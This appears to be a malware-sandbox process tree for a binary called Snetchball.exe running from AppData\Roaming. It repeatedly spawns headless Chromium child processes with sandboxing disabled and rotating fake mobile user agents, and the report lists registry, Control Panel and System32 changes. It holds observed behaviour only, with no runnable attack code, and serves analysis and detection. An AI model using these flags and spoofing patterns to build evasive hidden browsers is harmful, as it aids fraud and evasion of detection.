C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"26⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 EdgA/126.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2892 --field-trial-handle=2896,i,6033930259498316924,12749253306079441262,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:227⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 EdgA/126.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3000 --field-trial-handle=2896,i,6033930259498316924,12749253306079441262,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:827⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 EdgA/126.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3596 --field-trial-handle=2896,i,6033930259498316924,12749253306079441262,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:827⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 EdgA/126.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3628 --field-trial-handle=2896,i,6033930259498316924,12749253306079441262,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:127⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 EdgA/126.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3504 --field-trial-handle=2896,i,6033930259498316924,12749253306079441262,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:127⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"28⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"29⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2932 --field-trial-handle=2868,i,16976780963520408040,15212161069568009479,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:230⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3020 --field-trial-handle=2868,i,16976780963520408040,15212161069568009479,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:830⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3216 --field-trial-handle=2868,i,16976780963520408040,15212161069568009479,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:830⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3432 --field-trial-handle=2868,i,16976780963520408040,15212161069568009479,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:130⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3440 --field-trial-handle=2868,i,16976780963520408040,15212161069568009479,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:130⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"31⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"32⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/316.0.632200771 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2872 --field-trial-handle=2188,i,16939280345221090535,11664791068308957770,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:233⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/316.0.632200771 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3012 --field-trial-handle=2188,i,16939280345221090535,11664791068308957770,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:833⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/316.0.632200771 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3480 --field-trial-handle=2188,i,16939280345221090535,11664791068308957770,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:833⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/316.0.632200771 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3636 --field-trial-handle=2188,i,16939280345221090535,11664791068308957770,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:133⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/316.0.632200771 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3644 --field-trial-handle=2188,i,16939280345221090535,11664791068308957770,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:133⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"34⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"35⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2896 --field-trial-handle=2912,i,2476960873134416524,11183926778667008002,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:236⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3108 --field-trial-handle=2912,i,2476960873134416524,11183926778667008002,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:836⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3436 --field-trial-handle=2912,i,2476960873134416524,11183926778667008002,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:836⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3548 --field-trial-handle=2912,i,2476960873134416524,11183926778667008002,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:136⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3552 --field-trial-handle=2912,i,2476960873134416524,11183926778667008002,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:136⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3804 --field-trial-handle=2912,i,2476960873134416524,11183926778667008002,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:136⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=4044 --field-trial-handle=2912,i,2476960873134416524,11183926778667008002,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:836⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=4084 --field-trial-handle=2912,i,2476960873134416524,11183926778667008002,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:836⤵
- Modifies registry class
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4160 --field-trial-handle=2912,i,2476960873134416524,11183926778667008002,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:136⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4204 --field-trial-handle=2912,i,2476960873134416524,11183926778667008002,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:136⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4680 --field-trial-handle=2912,i,2476960873134416524,11183926778667008002,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:136⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=5276 --field-trial-handle=2912,i,2476960873134416524,11183926778667008002,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:236⤵
- Drops file in System32 directory
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"36⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2864 --field-trial-handle=2868,i,67535233678331218,1694352680262275005,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:237⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3172 --field-trial-handle=2868,i,67535233678331218,1694352680262275005,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:837⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3696 --field-trial-handle=2868,i,67535233678331218,1694352680262275005,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:837⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3704 --field-trial-handle=2868,i,67535233678331218,1694352680262275005,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:137⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3732 --field-trial-handle=2868,i,67535233678331218,1694352680262275005,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:137⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"38⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"39⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2860 --field-trial-handle=2864,i,302712558511215803,4821368404878417226,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:240⤵
-
-
